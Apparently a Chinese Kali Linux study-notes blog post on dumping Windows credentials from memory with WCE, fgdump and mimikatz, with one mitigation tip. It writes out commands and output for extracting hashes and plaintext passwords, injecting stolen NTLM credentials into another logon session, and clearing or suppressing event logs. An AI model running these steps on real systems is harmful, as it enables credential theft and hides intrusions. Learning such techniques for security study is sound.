前言

windows身份认证过程如图所示

上一届提到的pwdump是从SAM database里读取
如果能从内存里读取
面临的防卫会低很多

1、WCE（windows credential editor）

• windows 内核中保存有密码明文副本，安全机制较低
• 需要管理员权限
• 工具默认在 kali 的 /usr/share/wce/wce-universal #通用格式是自动识别32位和64位
• 多用户登录目标主机

过程如下：
将wce拷贝到windows
cmd中：

  C:\>wce-universal.exe -lv #查看登录用户0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D40000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0# 与 C:\>PwDump.exe localhost 结果相同C:\>wce-universal.exe -d 0020B19D #指定从内存里删除user1账号C:\>wce-universal.exe -lv #发现删除成功001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D40000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0C:\>wce-universal.exe -g passwd #计算密码对应的 HASH 值Password:   passwdHashes:     91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DECC:\>wce-universal.exe -w #读取内核中的明文密码user1\ICST-WINATT:123456user2\ICST-WINATT:123456test\ICST-WINATT:123456kevin\ICST-WINATT:123456NETWORK SERVICE\MSHOME:C:\>net user user1 111222 #修改内核中的密码C:\>wce-universal.exe -wuser1\ICST-WINATT:123456user2\ICST-WINATT:123456test\ICST-WINATT:123456kevin\ICST-WINATT:123456NETWORK SERVICE\MSHOME:# 发现内存里没有变化，当前内核中保存的值会在下次登录被读取出来C:\>wce-universal.exe -lv001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D40000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 #对 LUID 进行修改（将LUID改为匹配其他用户的用户名和密码）Changing NTLM credentials of logon session 001E5D92h to:Username: kevindomain: ICST-WINATTLMHash: 44EFCE164AB921CAAAD3B435B51404EENTHash: 32ED87BDB5FDC5E9CBA88547376818D4NTLM credentials successfully changed!C:\>wce-universal.exe -lv #再次查看发现已经被修改001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

防范手段：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

删除里面的
wdigest和tspka
不留空行

2、fgdump

在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/
放在 WinXP 中， 双击或在命令行执行 fgdump.exe 会自动生成三个文件，文件中保存着密码

3、mimikatz

在 kali 中的路径 /usr/share/mimikatz
大神级工具

放到win中
他的一些功能如下：

  C:\Win32>mimikatz.exe#查看帮助是::mimikatz # ::standard  -  Standard module  [Basic commands (does not require module name)]crypto  -  Crypto Modulesekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]kerberos  -  Kerberos package module  []privilege  -  Privilege moduleprocess  -  Process moduleservice  -  Service modulelsadump  -  LsaDump modulets  -  Terminal Server moduleevent  -  Event modulemisc  -  Miscellaneous moduletoken  -  Token manipulation modulevault  -  Windows Vault/Credential moduleminesweeper  -  MineSweeper modulenet  -dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]busylight  -  BusyLight Modulesysenv  -  System Environment Value modulesid  -  Security Identifiers moduleiis  -  IIS XML Config modulerpc  -  RPC control of mimikatz   mimikatz # privilege::Module :        privilegeFull name :     Privilege moduledebug  -  Ask debug privilege            * *driver  -  Ask load driver privilegesecurity  -  Ask security privilegetcb  -  Ask tcb privilegebackup  -  Ask backup privilegerestore  -  Ask restore privilegesysenv  -  Ask system environment privilegeid  -  Ask a privilege by its idname  -  Ask a privilege by its namemimikatz # privilege::debug #提权mimikatz # sekurlsa::mimikatz # sekurlsa::logonPasswords #会看到很多用户信息mimikatz # sekurlsa::wdigestmimikatz # process::list #查看进程mimikatz # lsadump::sam #获取sam中的用户数据mimikatz # lsadump::cache mimikatz # ts::multirdp #xp默认只允许登录一个用户，这个指令可以并行开用户mimikatz # event::clear #清除日志mimikatz # event::drop #不再产生新日志mimikatz # misc::regedit #注册表编辑器mimikatz # token::whoami #token里有whoami功能

结语

这些个工具都蛮好用的
mimikatz功能很全

Kali linux 学习笔记（二十三）提权——几个好工具（WCE、fgdump、mimikatz） 2020.3.4相关推荐

1. Kali linux 学习笔记（四十一）Web渗透——扫描工具之w3af 2020.3.18

   前言 w3af (web application attack and audit framework) 基于python开发 发现和利用所有web应用程序漏洞 比较重量级 功能有: audit(审计 ...

2. Kali Linux学习笔记—Web渗透（1）

   Kali Linux学习笔记-WEB渗透 侦察 Httrack 扫描 Nikto vega skipfish w3af Arachni OWASP_ZAP 必须掌握 Burpsuite 必须掌握 实验 ...

3. Kali Linux学习笔记—无线渗透 WPA攻击（PSK破解、AIROLIB、JTR、cowpatty、pyrit）

   Kali linux 学习笔记 无线渗透--WPA攻击(PSK破解.AIROLIB.JTR.cowpatty.pyrit) PSK破解原理 PSK破解过程 实验步骤--使用字典rockyou.txt ...

4. linux学习笔记二

   linux学习笔记二 文章目录 linux学习笔记二 finding finding hyx@hyx-computer:~$ cd mnt -bash: cd: mnt: No such file o ...

5. Cty的Linux学习笔记（十三）

   Linux学习笔记--第十三篇 特殊字符: !!:连续两个"!"表示执行上一条指令 !n:n是数字,表示执行命令历史中的第n调指令 !字符串(字符串大于):执行命令历史中最近一次以 ...

6. 2022自学kali linux学习笔记

   关于密码的破解 在Linux上 /etc/passwd /etc/shadow 使用命令 unshadow 第一步 unshadow /etc/passwd /etc/shadow >test_ ...

7. Kali linux 学习笔记（七十五）拒绝服务——teardrop 2020.4.15

   前言 本节学习teardrop 很古老 利用IP分段偏移 1.简介 teardrop 主要针对早期微软操作系统(95.98.3.x.nt) 近些年有人发现对 2.x 版本的安卓系统.6.0 IOS 系 ...

8. kali linux学习笔记

   ARP欺骗:netfuck 需先安装wpcapinstall 来源ip就是目标要欺骗的ip 目标ip是本机网关 双向欺骗 爆破常见服务: smb telnet ftp 3389 mssql mysql ...

9. Linux学习笔记二：Ubuntu启用root用户、更改软件源以及安装vim

   目录 1. 概述 2. 启用root用户 3.更改软件源 4. 安装VIM 5. GCC编译hello.c文件 1. 概述 在上一章中我们在虚拟机中安装了Ubuntu系统,从这章开始,就正式在开启li ...

最新文章

1. Disruptor技术调研之配置参数一览
2. 参加“北向峰会”后对SOC之感言
3. Jsp+Servlet+JavaBean经典MVC模式理解
4. 类的大小，虚函数，继承
5. 异常分发（内核异常）
6. 向maven中央仓库提交jar
7. 前端学习（2077）：开始回顾
8. 下载matlab安装包太慢_Matlab2017a软件安装包以及安装教程
9. 听说你还不懂哈夫曼树和哈夫曼编码
10. 黑圈数字符号0到50复制_电脑上怎么打出特殊符号「收藏」
11. linux误删除 dev disk文件,误删除 linux 系统文件了？这个方法教你解决
12. 基于VUE,VUX组件开发的网易新闻页面搭建过程
13. linux实现快捷键,Linux Bash下如何实现快捷键效果
14. 各种网页播放面板代码,MediaPlayer Replayer等
15. 我的世界热力膨胀JAVA_我的世界1.12-1.6.4热力膨胀 Thermal Expansion Mod下载
16. Python 多线程爬虫
17. Android7.0编译出现问题（Failed to contact Jack server）
18. RadiAnt DICOM Viewer 2022.2 BETA #25311
19. 公共关系礼仪实务章节测试题——公共关系概述（四）
20. 淘宝虚拟产品自动发货软件

热门文章

1. AD10 层相关操作【视图从底层往顶层看】【层切换】【层切换的快捷键的使用】【 阻焊层solder与助悍层paste】【增加机械层】
2. java 基础教程 ppt_java基础教程课件.ppt
3. Unity3D基础案例-见缝插针
4. 小金车系统可以实现从TXT库里添加用户
5. streamlit TypeError: Plain typing.NoReturn is not valid as type argument
6. 欢迎加入QQandroid群，群号【60591330】
7. 转：我们时代的思想责任与尊严
8. BestSync同步软件激活
9. DPDK系列之二DPDK编译
10. 【Python 3】SyntaxError: (unicode error) 'utf-8' codec can't decode byte 0xcf in position 0